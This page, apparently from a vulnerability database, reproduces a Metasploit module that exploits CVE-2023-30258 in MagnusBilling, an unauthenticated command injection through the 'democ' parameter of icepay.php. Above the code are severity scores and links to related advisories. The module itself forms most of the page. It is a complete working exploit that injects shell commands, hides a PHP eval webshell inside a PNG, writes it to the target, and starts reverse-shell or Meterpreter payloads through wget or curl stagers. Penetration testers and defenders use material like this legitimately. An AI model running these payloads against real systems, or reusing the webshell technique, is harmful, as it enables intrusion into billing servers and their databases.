Lucene search
H00die-gr3y <[email protected]>, EldstalMSF:EXPLOIT-LINUX-HTTP-MAGNUSBILLING_UNAUTH_RCE_CVE_2023_30258-HistoryOct 24, 2023 - 3:29 p.m.
MagnusBilling application unauthenticated Remote Command Execution.
magnusbilling
command injection
remote attackers
arbitrary commands
unauthenticated user
os commands
web server process
database compromise
vulnerability fix
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.439 Medium
EPSS
Percentile
97.4%
A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request. A piece of demonstration code is present in lib/icepay/icepay.php, with a call to an exec(). The parameter to exec() includes the GET parameter democ, which is controlled by the user and not properly sanitised/escaped. After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data or asterisk. At a minimum, this allows an attacker to compromise the billing system and its database. The following MagnusBilling applications are vulnerable: - MagnusBilling application version 6 (all versions); - MagnusBilling application up to version 7.x without commit 7af21ed620 which fixes this vulnerability;
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/stopwatch'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Exploit::Format::PhpPayloadPng
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'MagnusBilling application unauthenticated Remote Command Execution.',
'Description' => %q{
A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
remote attackers to run arbitrary commands via unauthenticated HTTP request.
A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
not properly sanitised/escaped.
After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
At a minimum, this allows an attacker to compromise the billing system and its database.
The following MagnusBilling applications are vulnerable:
- MagnusBilling application version 6 (all versions);
- MagnusBilling application up to version 7.x without commit 7af21ed620 which fixes this vulnerability;
},
'License' => MSF_LICENSE,
'Author' => [
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
'Eldstal' # Discovery of the vulnerability
],
'References' => [
['CVE', '2023-30258'],
['URL', 'https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258'],
['URL', 'https://eldstal.se/advisories/230327-magnusbilling.html']
],
'DisclosureDate' => '2023-06-26',
'Platform' => ['php', 'unix', 'linux'],
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
'Privileged' => true,
'Targets' => [
[
'PHP',
{
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Type' => :php,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
}
],
[
'Unix Command',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => ['linux'],
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :linux_dropper,
'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
'Linemax' => 2048,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [ true, 'The MagnusBilling endpoint URL', '/mbilling' ]),
OptString.new('WEBSHELL', [
false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
], conditions: %w[TARGET == 0])
])
end
def execute_command(cmd, _opts = {})
return send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', 'icepay.php'),
'vars_get' =>
{
'democ' => "/dev/null;#{cmd};#"
}
})
end
def execute_php(cmd, _opts = {})
payload = Base64.strict_encode64(cmd)
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', @webshell_name),
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
@post_param => payload
}
})
end
def upload_webshell
# randomize file name if option WEBSHELL is not set
@webshell_name = if datastore['WEBSHELL'].blank?
"#{Rex::Text.rand_text_alpha(8..16)}.php"
else
datastore['WEBSHELL'].to_s
end
@post_param = Rex::Text.rand_text_alphanumeric(1..8)
# inject PHP payload into the PLTE chunk of a PNG image to hide the payload
php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
return nil if png_webshell.nil?
# encode webshell data, set write and execute permissions and write to file on the target for execution
payload = Base64.strict_encode64(png_webshell.to_s)
cmd = "chmod 755 ./;echo #{payload}|base64 -d > ./#{@webshell_name}"
execute_command(cmd)
end
def check
print_status("Checking if #{peer} can be exploited.")
res = send_request_cgi!({
'method' => 'GET',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path)
})
# Check if target is a magnusbilling application
return CheckCode::Unknown('No response received from target.') unless res
return CheckCode::Safe('Likely not a magnusbilling application.') unless res.code == 200 && res.body =~ /MagnusBilling/i
# blind command injection using sleep command
sleep_time = rand(4..8)
print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
_res, elapsed_time = Rex::Stopwatch.elapsed_time do
execute_command("sleep #{sleep_time}")
end
print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time
CheckCode::Vulnerable('Successfully tested command injection.')
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :php
res = upload_webshell
fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
register_file_for_cleanup(@webshell_name.to_s)
execute_php(payload.encoded)
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
# Don't check the response here since the server won't respond
# if the payload is successfully executed.
execute_cmdstager({ linemax: target.opts['Linemax'] })
end
end
end
Related
prion
prion
Command injection
2023-06-23 12:15:00
nuclei
nuclei
MagnusBilling - Unauthenticated Remote Code Execution
2023-11-23 06:35:32
cve
cve
CVE-2023-30258
2023-06-23 12:15:09
packetstorm
packetstorm
MagnusBilling Remote Command Execution
2023-11-14 00:00:00
cvelist
cvelist
CVE-2023-30258
2023-06-23 00:00:00
nvd
nvd
CVE-2023-30258
2023-06-23 12:15:09
zdt
zdt
MagnusBilling Remote Command Execution Exploit
2023-11-14 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2023-11-10 18:59:55
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.439 Medium
EPSS
Percentile
97.4%
Related for MSF:EXPLOIT-LINUX-HTTP-MAGNUSBILLING_UNAUTH_RCE_CVE_2023_30258-